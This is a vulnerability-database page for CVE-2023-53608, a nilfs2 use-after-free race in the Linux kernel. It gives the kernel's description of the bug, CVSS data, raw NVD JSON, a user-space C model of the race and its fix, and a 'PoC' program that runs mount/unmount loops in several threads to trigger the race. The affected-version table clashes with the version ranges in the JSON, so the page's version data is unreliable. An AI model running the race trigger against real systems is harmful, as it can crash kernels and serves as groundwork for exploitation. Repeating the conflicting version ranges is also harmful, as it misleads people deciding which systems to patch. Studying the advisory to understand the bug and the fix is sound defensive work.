Security Vulnerability Report
CVE-2023-53608 CVSS 7.8 HIGH

CVE-2023-53608

Published: 2025-10-04 16:15:58
Last Modified: 2026-03-23 18:28:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

nilfs2: fix potential UAF of struct nilfs_sc_info in nilfs_segctor_thread()

The finalization of nilfs_segctor_thread() can race with nilfs_segctor_kill_thread(), which terminates that thread, potentially causing a use-after-free BUG as detected by KASAN.

At the end of nilfs_segctor_thread(), it assigns NULL to the "sc_task" member of "struct nilfs_sc_info" to indicate that the thread has finished, and then notifies nilfs_segctor_kill_thread() of this using the waitqueue "sc_wait_task" on the struct nilfs_sc_info.

However, immediately after the NULL assignment to "sc_task", it is possible that nilfs_segctor_kill_thread() will detect it and return to continue the deallocation, freeing the nilfs_sc_info structure before the thread does the notification.

This fixes the issue by protecting the NULL assignment to "sc_task" and its notification with the spinlock "sc_state_lock" of the struct nilfs_sc_info. Since nilfs_segctor_kill_thread() does a final check to see if "sc_task" is NULL with "sc_state_lock" locked, this eliminates the race.
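The ordering bug described above is easier to see in a small user-space model than in the filesystem code itself. The following C program is an added example, not code from the page or from the kernel: it stands in for sc_task, sc_wait_task and sc_state_lock with an atomic integer, a counter and a pthread mutex, replaces kfree() with a "freed" flag so the model can record a would-be use-after-free without touching freed memory, and runs the thread finalization both in the original order (lock released before the NULL store and the notification) and in the fixed order (NULL store and notification done under the lock, with the killer's final check also done under the lock). The struct and function names below are the example's own, chosen to mirror the kernel's.

```c
#define _POSIX_C_SOURCE 200809L
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* Model of struct nilfs_sc_info (names are this example's own). */
struct sc_info {
    pthread_mutex_t state_lock;   /* stands in for sc_state_lock */
    atomic_bool quit;             /* stands in for NILFS_SEGCTOR_QUIT in sc_state */
    atomic_int task;              /* 1 while the thread runs; 0 means sc_task == NULL */
    atomic_int wait_task_wakeups; /* stands in for the sc_wait_task waitqueue */
    atomic_bool freed;            /* set where the kernel would kfree(sci) */
    atomic_int uaf;               /* notifications issued after the "free" */
    bool fixed;                   /* true: store NULL and notify under the lock */
};

/* Finalization of nilfs_segctor_thread(): clear sc_task, then wake the killer. */
static void *segctor_thread(void *arg)
{
    struct sc_info *sci = arg;

    while (!atomic_load(&sci->quit))            /* the daemon's main loop */
        sched_yield();

    pthread_mutex_lock(&sci->state_lock);       /* held while winding down */
    if (!sci->fixed)
        pthread_mutex_unlock(&sci->state_lock); /* original order: released too early */

    atomic_store(&sci->task, 0);                /* sci->sc_task = NULL */
    sched_yield();                              /* preemption at the worst moment */

    /* wake_up(&sci->sc_wait_task) dereferences sci: a UAF if it was already freed */
    if (atomic_load(&sci->freed))
        atomic_fetch_add(&sci->uaf, 1);
    atomic_fetch_add(&sci->wait_task_wakeups, 1);

    if (sci->fixed)
        pthread_mutex_unlock(&sci->state_lock); /* fixed order: notify, then release */
    return NULL;
}

/* nilfs_segctor_kill_thread() followed by the caller's kfree(). */
static void kill_thread(struct sc_info *sci)
{
    pthread_mutex_lock(&sci->state_lock);
    atomic_store(&sci->quit, true);             /* sc_state |= NILFS_SEGCTOR_QUIT */
    while (atomic_load(&sci->task)) {           /* final check, lock held */
        pthread_mutex_unlock(&sci->state_lock);
        while (atomic_load(&sci->task))         /* wait_event(sc_wait_task, sc_task == NULL) */
            sched_yield();
        pthread_mutex_lock(&sci->state_lock);   /* blocks until the thread's critical section ends */
    }
    pthread_mutex_unlock(&sci->state_lock);
    atomic_store(&sci->freed, true);            /* kfree(sci) in the caller */
}

/* Runs n thread lifetimes; returns how many notifications hit "freed" memory (-1 on error). */
int run_trials(bool fixed, int n)
{
    int hits = 0;
    for (int i = 0; i < n; i++) {
        struct sc_info sci = { .fixed = fixed };
        pthread_mutex_init(&sci.state_lock, NULL);
        atomic_init(&sci.task, 1);
        pthread_t t;
        if (pthread_create(&t, NULL, segctor_thread, &sci) != 0)
            return -1;
        kill_thread(&sci);
        pthread_join(t, NULL);
        hits += atomic_load(&sci.uaf);
        pthread_mutex_destroy(&sci.state_lock);
    }
    return hits;
}

int main(void)
{
    printf("original order: %d use-after-free wakeups in 1000 runs\n", run_trials(false, 1000));
    printf("fixed order:    %d use-after-free wakeups in 1000 runs\n", run_trials(true, 1000));
    return 0;
}
```

The count for the original order depends on scheduling and may be zero on a single core, which is exactly why the kernel bug surfaced as an intermittent KASAN report rather than a reliable crash. The fixed order never reports a hit: the killer cannot re-acquire state_lock for its final check until the thread has both stored NULL and issued its notification, so the "free" is always ordered after the last access.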

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (all matching nodes use this CPE; the affected version ranges are listed below)
Linux kernel < 4.19.300
Linux kernel 4.20 ~ 5.4.262
Linux kernel 5.5 ~ 5.10.202
Linux kernel 5.11 ~ 5.15.140
Linux kernel 5.16 ~ 6.1.64
Linux kernel 6.2 ~ 6.5.13
Linux kernel 6.6 ~ 6.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2023-53608 - nilfs2 UAF PoC
 * This PoC demonstrates the race condition between
 * nilfs_segctor_thread() and nilfs_segctor_kill_thread().
 *
 * Note: requires a system with nilfs2 filesystem support
 * and local access with low privileges. mount(2) and umount(2)
 * additionally need CAP_SYS_ADMIN in the caller's mount namespace,
 * so the loop below only does anything when run with that capability.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>

#define MOUNT_POINT "/tmp/nilfs_test"
#define NILFS_DEVICE "/dev/nullb0" /* null_blk device for testing */

/* Thread function to repeatedly mount/unmount nilfs2 */
void *race_thread(void *arg)
{
    int iterations = *(int *)arg;

    for (int i = 0; i < iterations; i++) {
        /* Mount nilfs2 filesystem */
        if (mount(NILFS_DEVICE, MOUNT_POINT, "nilfs2", 0, "") == 0) {
            /* Create some files to trigger segment construction */
            char path[256];
            snprintf(path, sizeof(path), "%s/test_%d", MOUNT_POINT, i);
            int fd = open(path, O_CREAT | O_WRONLY, 0644);
            if (fd >= 0) {
                static const char msg[] = "trigger segment construction\n";
                write(fd, msg, sizeof(msg) - 1); /* whole string, newline included */
                close(fd);
            }
            /* Sync to trigger segctor thread */
            sync();
            /* Unmount quickly to race with kill_thread */
            umount(MOUNT_POINT);
        }
    }
    return NULL;
}

int main(void)
{
    int num_threads = 4;
    int iterations = 100;
    pthread_t threads[4];

    /* Create mount point */
    mkdir(MOUNT_POINT, 0755);

    printf("[+] Starting race condition trigger for CVE-2023-53608\n");
    printf("[+] Spawning %d threads, %d iterations each\n", num_threads, iterations);

    /* Launch multiple threads to increase race probability */
    for (int i = 0; i < num_threads; i++)
        pthread_create(&threads[i], NULL, race_thread, &iterations);

    /* Wait for all threads */
    for (int i = 0; i < num_threads; i++)
        pthread_join(threads[i], NULL);

    printf("[+] Race condition attempts completed\n");
    printf("[+] Check dmesg for KASAN UAF detection\n");

    rmdir(MOUNT_POINT);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53608", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.527", "lastModified": "2026-03-23T18:28:35.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix potential UAF of struct nilfs_sc_info in nilfs_segctor_thread()\n\nThe finalization of nilfs_segctor_thread() can race with\nnilfs_segctor_kill_thread() which terminates that thread, potentially\ncausing a use-after-free BUG as KASAN detected.\n\nAt the end of nilfs_segctor_thread(), it assigns NULL to \"sc_task\" member\nof \"struct nilfs_sc_info\" to indicate the thread has finished, and then\nnotifies nilfs_segctor_kill_thread() of this using waitqueue\n\"sc_wait_task\" on the struct nilfs_sc_info.\n\nHowever, here, immediately after the NULL assignment to \"sc_task\", it is\npossible that nilfs_segctor_kill_thread() will detect it and return to\ncontinue the deallocation, freeing the nilfs_sc_info structure before the\nthread does the notification.\n\nThis fixes the issue by protecting the NULL assignment to \"sc_task\" and\nits notification, with spinlock \"sc_state_lock\" of the struct\nnilfs_sc_info. 
Since nilfs_segctor_kill_thread() does a final check to\nsee if \"sc_task\" is NULL with \"sc_state_lock\" locked, this can eliminate\nthe race."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.30", "versionEndExcluding": "4.14.313", "matchCriteriaId": "C7897F33-089A-45DB-B407-301671DC567B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.281", "matchCriteriaId": "FA9A5EE5-EA8C-4F9C-8205-020D45B82C9B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.241", "matchCriteriaId": "A6C89301-5E43-4A77-878F-AC2043FD2741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.178", "matchCriteriaId": "896B51EF-6427-4DFF-A2CA-819B349840A1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.107", "matchCriteriaId": "6BCC0C73-754E-4985-A087-F74888650709"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", 
"versionEndExcluding": "6.1.24", "matchCriteriaId": "E6EC432F-985F-450F-954E-7EAD42ADA1F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.11", "matchCriteriaId": "93C03C9A-798F-4CD5-912F-A436BFA0CC7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/034cce77d52ba013ce62b4f5258c29907eb1ada5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0dbf0e64b91ee8fcb278aea93eb06fc7d56ecbcc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/613bf23c070d11c525268f2945aa594704a9b764", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6be49d100c22ffea3287a4b19d7639d259888e33", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/92684e02654c91a61a0b0561433b710bcece19fe", "sou ... (truncated)